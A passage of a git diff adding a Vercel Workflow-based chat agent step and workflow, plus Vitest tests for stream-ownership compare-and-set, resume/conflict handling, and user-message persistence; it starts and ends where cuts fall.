 create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts
 create mode 100644 lib/supabase/chats/updateChat.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
new file mode 100644
index 000000000..352dcd265
--- /dev/null
+++ b/app/lib/workflows/runAgentStep.ts
@@ -0,0 +1,55 @@
+import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
+import { gateway } from "@ai-sdk/gateway";
+import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+
+export type RunAgentStepInput = {
+  messages: UIMessage[];
+  modelId: string;
+  writable: WritableStream<UIMessageChunk>;
+};
+
+/**
+ * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
+ * `"use step"` so that:
+ *
+ *   - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside.
+ *   - The result is cached as a single durable event — replays after a crash
+ *     do not re-bill the model.
+ *
+ * Currently emits a plain text response with no tools. Sandbox tools land in
+ * the follow-up PR (port `@open-harness/agent` tools + wire via
+ * `experimental_context`).
+ *
+ * @param input - Messages + selected model + the workflow's writable stream.
+ * @returns finishReason from the model run (for the workflow loop's break condition).
+ */
+export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
+  "use step";
+
+  console.log("[runAgentStep] start", {
+    modelId: input.modelId,
+    messageCount: input.messages.length,
+  });
+
+  const modelMessages = convertToModelMessages(input.messages);
+  const result = streamText({
+    model: gateway(input.modelId),
+    system: agentCustomInstructions,
+    messages: modelMessages,
+  });
+
+  // Acquire the writer once and release in `finally` — re-acquiring per chunk
+  // (the previous shape) leaked the lock when any write threw.
+  const writer = input.writable.getWriter();
+  try {
+    for await (const part of result.toUIMessageStream()) {
+      await writer.write(part);
+    }
+  } finally {
+    writer.releaseLock();
+  }
+
+  const finishReason = await result.finishReason;
+  console.log("[runAgentStep] finish", { finishReason });
+  return { finishReason };
+}
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
new file mode 100644
index 000000000..db679145a
--- /dev/null
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -0,0 +1,56 @@
+import { getWritable } from "workflow";
+import type { UIMessage, UIMessageChunk } from "ai";
+import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+
+export type RunAgentWorkflowInput = {
+  messages: UIMessage[];
+  chatId: string;
+  sessionId: string;
+  modelId: string;
+};
+
+/**
+ * Vercel Workflow that drives the chat agent loop. The route handler calls
+ * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the
+ * client; this function writes UIMessage chunks into the workflow's writable
+ * via `runAgentStep`.
+ *
+ * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is
+ * unsafe today: each iteration would re-send the original prompt without
+ * the assistant's tool-call response in scope, so a `tool-calls` finish
+ * reason would loop forever on the same input. The proper multi-turn
+ * shape (where the step appends its response to `messages` before the
+ * next iteration) lands with the sandbox-tool port in PR 4.
+ *
+ * Until then, if the model returns `tool-calls` we log a warning and exit
+ * — the client receives the partial tool-call chunks but no follow-up turn.
+ *
+ * WDK constraints honored:
+ *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
+ */
+export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
+  "use workflow";
+
+  console.log("[runAgentWorkflow] start", {
+    chatId: input.chatId,
+    sessionId: input.sessionId,
+    modelId: input.modelId,
+  });
+
+  const writable = getWritable<UIMessageChunk>();
+  const result = await runAgentStep({
+    messages: input.messages,
+    modelId: input.modelId,
+    writable,
+  });
+
+  if (result.finishReason === "tool-calls") {
+    console.warn(
+      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
+      { chatId: input.chatId },
+    );
+  } else {
+    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
+  }
+}
diff --git a/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
new file mode 100644
index 000000000..af22bd363
--- /dev/null
+++ b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
@@ -0,0 +1,51 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+vi.mock("@/lib/supabase/chats/updateChat", () => ({
+  updateChat: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("compareAndSetChatActiveStreamId", () => {
+  it("returns ok:true claimed:true when the row predicate matches and is updated", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: true, claimed: true });
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: null } },
+      { active_stream_id: "wrun_x" },
+    );
+  });
+
+  it("returns ok:true claimed:false when the predicate matches no rows (race lost)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 0, row: null });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: true, claimed: false });
+  });
+
+  it("returns ok:false with the underlying error on DB failure (distinct from race lost)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: false, error: "down" });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: false, error: "down" });
+  });
+
+  it("supports expecting a specific run id (placeholder → real promotion)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    await compareAndSetChatActiveStreamId("chat-1", "pending-abc", "wrun_real");
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: "pending-abc" } },
+      { active_stream_id: "wrun_real" },
+    );
+  });
+
+  it("supports next=null (releasing the slot)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    await compareAndSetChatActiveStreamId("chat-1", "wrun_old", null);
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: "wrun_old" } },
+      { active_stream_id: null },
+    );
+  });
+});
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
index c61911be8..fb3b434f1 100644
--- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -6,22 +6,38 @@ import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
 import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
 import { selectChats } from "@/lib/supabase/chats/selectChats";
 import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { updateSession } from "@/lib/supabase/sessions/updateSession";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
+import { start, getRun } from "workflow/api";
 
-vi.mock("@/lib/chat/validateChatWorkflow", () => ({
-  validateChatWorkflow: vi.fn(),
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({ validateChatWorkflow: vi.fn() }));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ selectSessions: vi.fn() }));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({ selectChats: vi.fn() }));
+vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({
+  compareAndSetChatActiveStreamId: vi.fn(),
 }));
-vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
-  selectSessions: vi.fn(),
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({ isSandboxActive: vi.fn() }));
+vi.mock("@/lib/supabase/sessions/updateSession", () => ({ updateSession: vi.fn() }));
+vi.mock("@/lib/sandbox/buildActiveLifecycleUpdate", () => ({
+  buildActiveLifecycleUpdate: vi.fn(() => ({})),
 }));
-vi.mock("@/lib/supabase/chats/selectChats", () => ({
-  selectChats: vi.fn(),
+vi.mock("@/lib/chat/maybeResumeChatStream", () => ({
+  maybeResumeChatStream: vi.fn(),
 }));
-vi.mock("@/lib/sandbox/isSandboxActive", () => ({
-  isSandboxActive: vi.fn(),
+vi.mock("@/lib/chat/persistLatestUserMessage", () => ({
+  persistLatestUserMessage: vi.fn(),
 }));
+vi.mock("workflow/api", () => ({
+  start: vi.fn(),
+  getRun: vi.fn(),
+}));
+vi.mock("@/app/lib/workflows/runAgentWorkflow", () => ({ runAgentWorkflow: vi.fn() }));
 vi.mock("@/lib/networking/getCorsHeaders", () => ({
   getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
 }));
+vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") }));
 
 const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
 const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
@@ -36,130 +52,275 @@ function makeRequest(): NextRequest {
   });
 }
 
-function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+function mockValidated() {
   vi.mocked(validateChatWorkflow).mockResolvedValue({
     messages: [],
     chatId: CHAT_ID,
     sessionId: SESSION_ID,
-    accountId: overrides.accountId ?? ACCOUNT_ID,
+    accountId: ACCOUNT_ID,
     orgId: null,
     authToken: "test-key",
   });
 }
 
-function mockOwnedSessionWithActiveSandbox() {
-  mockValidatedRequest();
+function mockSessionOwnedActive(extra: Record<string, unknown> = {}) {
   vi.mocked(selectSessions).mockResolvedValue([
-    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true }, ...extra } as never,
   ]);
-  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
   vi.mocked(isSandboxActive).mockReturnValue(true);
 }
 
-describe("handleChatWorkflowStream (stub)", () => {
-  beforeEach(() => {
-    vi.clearAllMocks();
+function mockChatOwned(extra: Record<string, unknown> = {}) {
+  vi.mocked(selectChats).mockResolvedValue([
+    {
+      id: CHAT_ID,
+      session_id: SESSION_ID,
+      active_stream_id: null,
+      model_id: null,
+      ...extra,
+    } as never,
+  ]);
+}
+
+function mockStartedRun(runId = "wrun_test_run_1") {
+  const stream = new ReadableStream<unknown>({
+    start(controller) {
+      controller.enqueue({ type: "text-start", id: "a" });
+      controller.close();
+    },
   });
+  vi.mocked(start).mockResolvedValue({ runId, getReadable: () => stream } as never);
+  vi.mocked(getRun).mockReturnValue({ cancel: vi.fn(() => Promise.resolve()) } as never);
+  return { runId, stream };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Default: maybeResumeChatStream returns null (no resume / no active stream)
+  vi.mocked(maybeResumeChatStream).mockResolvedValue(null);
+});
 
-  describe("validation short-circuits", () => {
-    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
-      const authError = NextResponse.json(
-        { status: "error", error: "Unauthorized" },
-        { status: 401 },
+describe("handleChatWorkflowStream", () => {
+  describe("short-circuit responses", () => {
+    it("passes through the validator's response (401/400)", async () => {
+      vi.mocked(validateChatWorkflow).mockResolvedValue(
+        NextResponse.json({ status: "error", error: "Unauthorized" }, { status: 401 }),
       );
-      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(401);
+      expect(start).not.toHaveBeenCalled();
     });
 
-    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
-      const badBody = NextResponse.json(
-        { status: "error", error: "Invalid JSON body" },
-        { status: 400 },
-      );
-      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+    it("returns 500 when selectSessions errors", async () => {
+      mockValidated();
+      vi.mocked(selectSessions).mockResolvedValue(null);
       const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(400);
+      expect(res.status).toBe(500);
     });
-  });
 
-  describe("session / chat ownership", () => {
-    beforeEach(() => mockValidatedRequest());
-
-    it("returns 404 when the session does not exist", async () => {
+    it("returns 404 when session does not exist", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(404);
     });
 
-    it("returns 500 when selectSessions errors (returns null)", async () => {
-      vi.mocked(selectSessions).mockResolvedValue(null);
-      const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(500);
-    });
-
-    it("returns 403 when the session is owned by a different account", async () => {
+    it("returns 403 when session not owned", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: {} } as never,
       ]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(403);
     });
 
-    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+    it("returns 400 when sandbox is inactive", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([
         { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
       ]);
       vi.mocked(isSandboxActive).mockReturnValue(false);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(400);
-      const body = await res.json();
-      expect(body.error).toMatch(/sandbox/i);
     });
 
-    it("returns 404 when the chat does not exist", async () => {
-      vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
-      ]);
-      vi.mocked(isSandboxActive).mockReturnValue(true);
+    it("returns 404 when chat does not exist", async () => {
+      mockValidated();
+      mockSessionOwnedActive();
       vi.mocked(selectChats).mockResolvedValue([]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(404);
     });
+  });
 
-    it("returns 404 when chat exists but belongs to a different session", async () => {
-      vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
-      ]);
-      vi.mocked(isSandboxActive).mockReturnValue(true);
-      vi.mocked(selectChats).mockResolvedValue([
-        { id: CHAT_ID, session_id: "different-session" } as never,
-      ]);
+  describe("resume / conflict via maybeResumeChatStream", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned({ active_stream_id: "wrun_existing" });
+    });
+
+    it("returns the resume response when maybeResumeChatStream yields one", async () => {
+      const resumeResponse = new Response("ok", {
+        status: 200,
+        headers: { "x-workflow-run-id": "wrun_existing" },
+      });
+      vi.mocked(maybeResumeChatStream).mockResolvedValue(resumeResponse);
       const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(404);
+      expect(res.headers.get("x-workflow-run-id")).toBe("wrun_existing");
+      expect(start).not.toHaveBeenCalled();
+    });
+
+    it("returns the conflict response when maybeResumeChatStream yields 409", async () => {
+      const conflict = NextResponse.json({ status: "error", error: "conflict" }, { status: 409 });
+      vi.mocked(maybeResumeChatStream).mockResolvedValue(conflict);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(409);
+      expect(start).not.toHaveBeenCalled();
     });
   });
 
-  describe("success (stub response)", () => {
-    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+  describe("placeholder CAS before start", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
+    });
+
+    it("returns 500 when the placeholder-CAS hits a DB error", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({
+        ok: false,
+        error: "down",
+      });
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+      expect(start).not.toHaveBeenCalled();
+    });
 
-    it("returns 200 with text/event-stream content type", async () => {
+    it("returns 409 (without calling start) when the placeholder-CAS loses the race", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({
+        ok: true,
+        claimed: false,
+      });
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(409);
+      expect(start).not.toHaveBeenCalled();
+    });
+
+    it("starts the workflow only after placeholder CAS succeeds", async () => {
+      // First CAS = placeholder claim, second CAS = promote placeholder → real run id
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: true });
+      mockStartedRun();
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(start).toHaveBeenCalled();
+      // Confirm CAS-before-start ordering — first CAS pre-claims with expected=null
+      const firstCallArgs = vi.mocked(compareAndSetChatActiveStreamId).mock.calls[0];
+      expect(firstCallArgs?.[0]).toBe(CHAT_ID);
+      expect(firstCallArgs?.[1]).toBeNull();
+      expect(firstCallArgs?.[2]).toMatch(/^pending-/);
+    });
+  });
+
+  describe("happy path", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: true });
+    });
+
+    it("returns 200 with text/event-stream and x-workflow-run-id", async () => {
+      const { runId } = mockStartedRun("wrun_abc_123");
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(200);
       expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+      expect(res.headers.get("x-workflow-run-id")).toBe(runId);
+    });
+
+    it("refreshes session lifecycle activity", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      expect(updateSession).toHaveBeenCalledWith(SESSION_ID, expect.any(Object));
+    });
+
+    it("fire-and-forgets persistLatestUserMessage", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      expect(persistLatestUserMessage).toHaveBeenCalledWith(CHAT_ID, []);
+    });
+
+    it("passes chat.model_id into the workflow when set", async () => {
+      vi.mocked(selectChats).mockResolvedValue([
+        {
+          id: CHAT_ID,
+          session_id: SESSION_ID,
+          active_stream_id: null,
+          model_id: "anthropic/claude-opus-4.6",
+        } as never,
+      ]);
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string };
+      expect(startArgs.modelId).toBe("anthropic/claude-opus-4.6");
+    });
+
+    it("falls back to the default model when chat.model_id is null", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string };
+      expect(startArgs.modelId).toBe("anthropic/claude-haiku-4.5");
+    });
+  });
+
+  describe("promote placeholder → run id", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
     });
 
-    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+    it("awaits cancel() and returns 409 if promote loses", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true }) // claim ok
+        .mockResolvedValueOnce({ ok: true, claimed: false }); // promote raced
+      const cancel = vi.fn(() => Promise.resolve());
+      vi.mocked(start).mockResolvedValue({
+        runId: "wrun_lost",
+        getReadable: () => new ReadableStream(),
+      } as never);
+      vi.mocked(getRun).mockReturnValue({ cancel } as never);
       const res = await handleChatWorkflowStream(makeRequest());
-      const runId = res.headers.get("x-workflow-run-id");
-      expect(runId).toBeTruthy();
-      expect(runId!.startsWith("stub-")).toBe(true);
+      expect(res.status).toBe(409);
+      expect(getRun).toHaveBeenCalledWith("wrun_lost");
+      expect(cancel).toHaveBeenCalled();
     });
 
-    it("emits a stream body that includes the stub assistant text", async () => {
+    it("still returns 409 if cancel() throws (best-effort)", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: false });
+      vi.mocked(start).mockResolvedValue({
+        runId: "wrun_lost",
+        getReadable: () => new ReadableStream(),
+      } as never);
+      // Wrap rejection in an async IIFE + attach a noop handler so Vitest's
+      // unhandled-rejection watcher doesn't fire before the SUT awaits.
+      const cancelRejection = (async () => {
+        throw new Error("cancel exploded");
+      })();
+      cancelRejection.catch(() => {
+        /* SUT will await this and convert to logged catch */
+      });
+      vi.mocked(getRun).mockReturnValue({
+        cancel: vi.fn(() => cancelRejection),
+      } as never);
       const res = await handleChatWorkflowStream(makeRequest());
-      const text = await res.text();
-      expect(text).toContain("Hello from /api/chat/workflow");
+      expect(res.status).toBe(409);
     });
   });
 });
diff --git a/lib/chat/__tests__/maybeResumeChatStream.test.ts b/lib/chat/__tests__/maybeResumeChatStream.test.ts
new file mode 100644
index 000000000..999c29d24
--- /dev/null
+++ b/lib/chat/__tests__/maybeResumeChatStream.test.ts
@@ -0,0 +1,46 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+
+vi.mock("@/lib/chat/reconcileExistingActiveStream", () => ({
+  reconcileExistingActiveStream: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("maybeResumeChatStream", () => {
+  it("returns null when there is no active_stream_id", async () => {
+    const res = await maybeResumeChatStream("chat-1", null);
+    expect(res).toBeNull();
+    expect(reconcileExistingActiveStream).not.toHaveBeenCalled();
+  });
+
+  it("returns null when reconcile says action=ready", async () => {
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "ready" });
+    const res = await maybeResumeChatStream("chat-1", "wrun_dead");
+    expect(res).toBeNull();
+  });
+
+  it("returns a 200 SSE response with x-workflow-run-id on resume", async () => {
+    const stream = new ReadableStream();
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({
+      action: "resume",
+      runId: "wrun_live",
+      stream,
+    });
+    const res = await maybeResumeChatStream("chat-1", "wrun_live");
+    expect(res).not.toBeNull();
+    expect(res!.status).toBe(200);
+    expect(res!.headers.get("x-workflow-run-id")).toBe("wrun_live");
+    expect(res!.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+  });
+
+  it("returns a 409 on conflict", async () => {
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "conflict" });
+    const res = await maybeResumeChatStream("chat-1", "wrun_x");
+    expect(res!.status).toBe(409);
+  });
+});
diff --git a/lib/chat/__tests__/persistLatestUserMessage.test.ts b/lib/chat/__tests__/persistLatestUserMessage.test.ts
new file mode 100644
index 000000000..28d4f7650
--- /dev/null
+++ b/lib/chat/__tests__/persistLatestUserMessage.test.ts
@@ -0,0 +1,129 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
+
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+vi.mock("@/lib/supabase/chat_messages/upsertChatMessage", () => ({
+  upsertChatMessage: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chat_messages/selectChatMessages", () => ({
+  selectChatMessages: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/updateChat", () => ({
+  updateChat: vi.fn(),
+}));
+
+const CHAT_ID = "chat-1";
+const MSG_ID = "msg-1";
+
+function userMessage(text = "hello world", id = MSG_ID) {
+  return { id, role: "user" as const, parts: [{ type: "text" as const, text }] };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+});
+
+describe("persistLatestUserMessage", () => {
+  it("no-ops when the last message is not a user message", async () => {
+    await persistLatestUserMessage(CHAT_ID, [{ id: "a", role: "assistant", parts: [] } as never]);
+    expect(upsertChatMessage).not.toHaveBeenCalled();
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("no-ops when messages array is empty", async () => {
+    await persistLatestUserMessage(CHAT_ID, []);
+    expect(upsertChatMessage).not.toHaveBeenCalled();
+  });
+
+  it("bails on DB error (upsert ok:false) without touching the chat", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({ ok: false, error: "down" });
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("bails on duplicate (already persisted) without touching the chat", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({ ok: true, row: null, isDuplicate: true });
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("touches updated_at after a new insert", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: "different-msg" } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const firstCall = vi.mocked(updateChat).mock.calls[0];
+    expect(firstCall?.[0]).toEqual({ id: CHAT_ID });
+    expect(firstCall?.[1]).toMatchObject({ updated_at: expect.any(String) });
+  });
+
+  it("sets chat.title when the inserted message is the earliest", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage("Hello there from a test")]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall?.[1]).toEqual({ title: "Hello there from a test" });
+  });
+
+  it("skips title when the inserted message is no longer the earliest", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: "older-msg" } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall).toBeUndefined();
+  });
+
+  it("truncates titles to exactly TITLE_MAX_LENGTH including the suffix", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]);
+    const long = "x".repeat(120);
+    await persistLatestUserMessage(CHAT_ID, [userMessage(long)]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    const title = (titleCall?.[1] as { title: string }).title;
+    expect(title.length).toBe(80);
+    expect(title.endsWith("…")).toBe(true);
+  });
+
+  it("bails on title-set when selectChatMessages errors (null)", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue(null);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall).toBeUndefined();
+  });
+
+  it("swallows thrown errors without escaping", async () => {
+    vi.mocked(upsertChatMessage).mockRejectedValue(new Error("boom"));
+    await expect(persistLatestUserMessage(CHAT_ID, [userMessage()])).resolves.toBeUndefined();
+  });
+});
diff --git a/lib/chat/__tests__/reconcileExistingActiveStream.test.ts b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts
new file mode 100644
index 000000000..b40e12ce6
--- /dev/null
+++ b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts
@@ -0,0 +1,92 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+import { getRun } from "workflow/api";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+
+vi.mock("workflow/api", () => ({
+  getRun: vi.fn(),
+}));
+vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({
+  compareAndSetChatActiveStreamId: vi.fn(),
+}));
+
+const CHAT_ID = "chat-1";
+const RUN_ID = "wrun_test";
+
+beforeEach(() => vi.clearAllMocks());
+
+function mockRun(status: string, getReadable: () => ReadableStream = () => new ReadableStream()) {
+  vi.mocked(getRun).mockReturnValue({
+    status: Promise.resolve(status),
+    getReadable,
+  } as never);
+}
+
+describe("reconcileExistingActiveStream", () => {
+  it("returns action=resume when status is 'running'", async () => {
+    const stream = new ReadableStream();
+    mockRun("running", () => stream);
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
+    expect(result.action).toBe("resume");
+    if (result.action !== "resume") return;
+    expect(result.runId).toBe(RUN_ID);
+    expect(result.stream).toBe(stream);
+  });
+
+  it("returns action=resume when status is 'pending'", async () => {
+    mockRun("pending");
+    const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID);
